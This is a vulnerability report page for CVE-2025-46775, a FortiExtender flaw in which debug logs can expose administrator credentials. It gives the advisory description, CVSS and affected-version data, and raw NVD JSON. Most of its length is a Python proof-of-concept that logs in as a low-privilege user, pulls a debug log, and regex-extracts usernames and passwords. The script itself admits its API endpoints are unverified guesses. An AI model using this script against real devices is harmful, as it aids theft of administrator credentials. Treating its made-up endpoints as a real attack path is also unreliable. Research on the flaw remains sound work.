Security Vulnerability Report
CVE-2025-46775 CVSS 5.5 MEDIUM

CVE-2025-46775

Published: 2025-11-18 17:16:02
Last Modified: 2025-11-20 14:40:25

Description

A debug messages revealing unnecessary information vulnerability in Fortinet FortiExtender 7.6.0 through 7.6.1, FortiExtender 7.4.0 through 7.4.6, FortiExtender 7.2 all versions, FortiExtender 7.0 all versions may allow an authenticated user to obtain administrator credentials via debug log commands. Note that the CVSS vector below is AV:L (local): the attacker is assumed to already have an authenticated local session (e.g. CLI access) rather than merely network reachability, which is why the score stays at MEDIUM despite the high confidentiality impact. The NVD CPE ranges in the raw data (7.0.0 ≤ version < 7.4.8 and 7.6.0 ≤ version < 7.6.3) indicate that 7.4.8 and 7.6.3 are the first releases outside the affected range.

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:o:fortinet:fortiextender_firmware:*:*:*:*:*:*:*:* (7.0.0 ≤ version < 7.4.8) - VULNERABLE
cpe:2.3:o:fortinet:fortiextender_firmware:*:*:*:*:*:*:*:* (7.6.0 ≤ version < 7.6.3) - VULNERABLE
cpe:2.3:h:fortinet:fortiextender:-:*:*:*:*:*:*:* (hardware platform, listed as a running-on/with condition) - NOT VULNERABLE
FortiExtender 7.6.0 - 7.6.1
FortiExtender 7.4.0 - 7.4.6
FortiExtender 7.2 all versions
FortiExtender 7.0 all versions
(The NVD CPE match for the 7.0–7.4 train is "version < 7.4.8", which also covers 7.4.7; treat anything below 7.4.8 or below 7.6.3 as affected until confirmed otherwise against the vendor advisory.)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only. The HTTPS API paths it uses are not documented in the vendor advisory (which describes CLI "debug log" commands and rates the issue AV:L), so they should be treated as unverified placeholders rather than confirmed exploit steps.
python
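#!/usr/bin/env python3
# CVE-2025-46775 PoC - FortiExtender Debug Log Information Disclosure
#
# Demonstrates the advisory's claim that an authenticated low-privilege user
# can read administrator credentials out of debug log output.
#
# NOTE(review): the vendor advisory (FG-IR-25-259) talks about "debug log
# commands" and scores the issue AV:L (local).  The HTTPS endpoints used
# below are not taken from the advisory and have not been verified against
# a device; treat them as placeholders to be confirmed, not as documented
# API paths.

import argparse
import re
import sys

# Configuration (defaults; can be overridden on the command line)
TARGET_IP = "192.168.1.99"          # Target FortiExtender IP
USERNAME = "low_privilege_user"     # Low privilege user account
PASSWORD = "user_password"

# Case-insensitive markers that suggest credential material in log text.
_HINT_WORDS = ("admin", "password")

# Generic "key = value" / "key: value" forms with an optional quote around
# the value.  The real FortiExtender debug output format is not documented
# in the advisory, so these are a best-effort guess -- TODO confirm.
_USER_RE = re.compile(
    r"(?:user(?:name)?|login)\b\s*[:=]\s*[\"']?([^\s,;\"']+)", re.IGNORECASE
)
_PASS_RE = re.compile(
    r"pass(?:word|wd)?\b\s*[:=]\s*[\"']?([^\s,;\"']+)", re.IGNORECASE
)


def credential_hints(text):
    """Return the lines of *text* that contain a credential marker word.

    This is the loose heuristic the original PoC applied to the whole
    response ("admin" or "password" anywhere, case-insensitive), returned
    per line so an operator can triage matches by eye.  It is deliberately
    noisy: any debug log that merely mentions the "admin" account matches.

    Args:
        text: raw debug log output.

    Returns:
        The matching lines, in order; ``[]`` when nothing matches.
    """
    return [
        line
        for line in text.splitlines()
        if any(word in line.lower() for word in _HINT_WORDS)
    ]


def parse_exposed_credentials(data):
    """Extract username/password pairs from debug log output.

    Args:
        data: raw debug log output.

    Returns:
        A list of ``{"username": ..., "password": ...}`` dicts, one per line
        on which both a user-like and a password-like ``key=value`` token
        were found.  Lines carrying only one of the two are ignored, and
        ``[]`` is returned when nothing matches.

    The original PoC left this as a stub that always returned ``[]``, which
    made the "credentials obtained" branch of the caller unreachable.  The
    patterns used here are a generic guess at the log format; confirm them
    against real device output before relying on the result.
    """
    found = []
    for line in data.splitlines():
        user = _USER_RE.search(line)
        secret = _PASS_RE.search(line)
        if user and secret:
            found.append({"username": user.group(1), "password": secret.group(1)})
    return found


def exploit_cve_2025_46775(target_ip=TARGET_IP, username=USERNAME,
                           password=PASSWORD, *, verify=False, timeout=10):
    """Authenticate as a low-privilege user and pull the debug log.

    Args:
        target_ip: FortiExtender management address.
        username: account of an *authenticated* (non-admin) user, as the
            advisory requires.
        password: that account's password.
        verify: TLS certificate verification passed to ``requests``.
            Defaults to ``False`` because lab devices usually present
            self-signed certificates; pass ``True`` (or a CA bundle path)
            whenever possible, since an unverified session can itself leak
            the test credentials to a man-in-the-middle.
        timeout: per-request timeout in seconds.

    Returns:
        ``True`` only when credential pairs were actually parsed out of the
        debug output; ``False`` on any connection, authentication or lookup
        failure.  Lines that merely look credential-like are printed for
        manual review but do not count as success.
    """
    # Imported here so the pure parsing helpers above stay importable (and
    # unit-testable) on hosts without the third-party ``requests`` package.
    import requests

    print(f"[*] Targeting FortiExtender: {target_ip}")
    print(f"[*] Authenticating as: {username}")

    auth_url = f"https://{target_ip}/api/v2/login"
    debug_url = f"https://{target_ip}/api/v2/cmdb/system/debug"
    debug_params = {"action": "log", "level": "debug"}

    # Session is closed on exit so the connection pool does not linger.
    with requests.Session() as session:
        # Step 1: authenticate as the low-privilege user.
        try:
            response = session.post(
                auth_url,
                json={"username": username, "password": password},
                verify=verify,
                timeout=timeout,
            )
        except requests.exceptions.RequestException as exc:
            print(f"[-] Connection error: {exc}")
            return False
        if response.status_code != 200:
            print("[-] Authentication failed")
            return False
        print("[+] Authentication successful")

        # Step 2: request the debug log that the advisory says may carry
        # administrator credentials.
        print("[*] Executing debug log command...")
        try:
            response = session.get(
                debug_url, params=debug_params, verify=verify, timeout=timeout
            )
        except requests.exceptions.RequestException as exc:
            print(f"[-] Request error: {exc}")
            return False

    if response.status_code != 200:
        print(f"[-] Debug command failed: {response.status_code}")
        return False
    print("[+] Debug log retrieved")

    hints = credential_hints(response.text)
    if not hints:
        # Explicit False here: the original fell off the end of the function
        # (returning None) when the marker words were absent.
        print("[-] No credentials found in debug log")
        return False

    print("[!] Admin credentials potentially exposed!")
    print("[*] Extracting sensitive information...")
    exposed_data = parse_exposed_credentials(response.text)
    if not exposed_data:
        # Marker words matched but nothing parsed: most likely a false
        # positive of the loose heuristic, or a log format the regexes do
        # not cover.  Show the lines so the operator can judge instead of
        # silently reporting failure.
        print("[-] No credentials parsed; matching lines for manual review:")
        for line in hints:
            print(f"    {line}")
        return False

    # Credentials are written to stdout in clear; redirect or scrub the
    # output before attaching it to a report.
    print("[+] Exposed credentials found:")
    for cred in exposed_data:
        print(f" - Username: {cred.get('username')}")
        print(f" - Password: {cred.get('password')}")
    return True


def _parse_args(argv):
    """Command-line overrides for the module-level defaults.

    Running with no arguments behaves exactly like the original script
    (hard-coded target and credentials, TLS verification off).
    """
    parser = argparse.ArgumentParser(
        description="CVE-2025-46775 PoC - FortiExtender Debug Log Information Disclosure"
    )
    parser.add_argument("--target", default=TARGET_IP,
                        help="FortiExtender IP (default: %(default)s)")
    parser.add_argument("--username", default=USERNAME,
                        help="low-privilege account (default: %(default)s)")
    # A password on argv is visible to other local users via the process
    # list; prefer editing PASSWORD or wrapping this in a tool that prompts.
    parser.add_argument("--password", default=PASSWORD,
                        help="password for --username")
    parser.add_argument("--verify", action="store_true",
                        help="verify the device TLS certificate (default: off)")
    return parser.parse_args(argv)


if __name__ == "__main__":
    args = _parse_args(sys.argv[1:])
    print("CVE-2025-46775 PoC - FortiExtender Debug Log Information Disclosure")
    print("=" * 70)
    success = exploit_cve_2025_46775(
        args.target, args.username, args.password, verify=args.verify
    )
    if success:
        print("\n[+] Exploitation successful - Admin credentials obtained")
    else:
        print("\n[-] Exploitation failed")
    sys.exit(0 if success else 1)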

References

- https://fortiguard.fortinet.com/psirt/FG-IR-25-259 — Fortinet PSIRT advisory FG-IR-25-259 (vendor advisory; the only reference listed in the NVD record below)
Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-46775", "sourceIdentifier": "[email protected]", "published": "2025-11-18T17:16:01.973", "lastModified": "2025-11-20T14:40:25.397", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A debug messages revealing unnecessary information vulnerability in Fortinet FortiExtender 7.6.0 through 7.6.1, FortiExtender 7.4.0 through 7.4.6, FortiExtender 7.2 all versions, FortiExtender 7.0 all versions may allow an authenticated user to obtain administrator credentials via debug log commands."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-1295"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:fortinet:fortiextender_firmware:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.0.0", "versionEndExcluding": "7.4.8", "matchCriteriaId": "D99BE066-31DA-417E-9C7F-73453CE4A69D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:fortinet:fortiextender_firmware:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.6.0", "versionEndExcluding": "7.6.3", "matchCriteriaId": "3F3DA4B8-95C4-407B-B632-D8F48C89511E"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:fortinet:fortiextender:-:*:*:*:*:*:*:*", "matchCriteriaId": "A0617C1D-E321-409D-B54B-775E854A03C1"}]}]}], "references": [{"url": "https://fortiguard.fortinet.com/psirt/FG-IR-25-259", "source": "[email 
protected]", "tags": ["Vendor Advisory"]}]}}